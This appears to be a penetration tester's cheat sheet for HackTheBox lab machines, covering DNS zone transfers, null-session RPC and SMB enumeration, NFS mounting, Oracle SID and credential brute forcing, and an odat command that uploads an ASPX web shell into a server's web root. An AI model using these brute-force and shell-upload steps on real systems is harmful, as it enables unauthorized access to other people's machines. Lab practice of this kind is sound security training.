DNS Enumeration:

Zone Transfer commands:

host -l friendzone.htb
dig axfr friendzoneportal.red @10.10.10.123
*****************************************************************************************************************************
RPC Enumeration:

Connect with RPC Service
rpcclient -U "" -N 10.10.10.161

get a list of users with enumdomusers:
enumdomusers

list the group:
enumdomgroups

query the user with rid:
queryuser <rid>

query the group with group rid
querygroup <rid>

Once you get a list of user save it on file and run following command to extract usernames from the file
cat domain-users.txt | cut -d'[' -f2 | cut -d']' -f1

*****************************************************************************************************************************
SMB ENume:

List Directories:

smbmap -H 10.10.10.3

Connect to smb:

smbclient -N //10.10.10.3/tmp
smbmap //10.10.10.123/general

If above command didn't work try:

smbclient -N -L //10.10.10.3/tmp --option='client min protocol=NT1'

Access SMB with valid Creds:

smbclient -W active.htb -U Administrator //10.10.10.3/tmp

Nmap command to find smb vulns:

nmap --script smb-vuln* -p 445 -oA nmap/smb_vulns 10.10.10.4

*****************************************************************************************************************************

NFS Enum:

Shows the directories moundted on NFS:
Showmount -e <target>

mount nfs share with following command:


mkdir /tmp/mount && mount 192.168.1.22:/home/karl /tmp/mount

*****************************************************************************************************************************

Oracle Enumeration:

SID Bruteforce

auxiliary/scanner/oracle/sid_brute

Credentials bruteforce

auxiliary/admin/oracle/oracle_login

Upload shell in oracle:

odat dbmsxslprocessor --sysdba -s 10.10.10.82 -U scott -P tiger -d XE --putFile "C:\\inetpub\\wwwroot\\" "shell1.aspx" "/home/deepak/HTB/Boxes/Silo/shell1.aspx"
*****************************************************************************************************************************
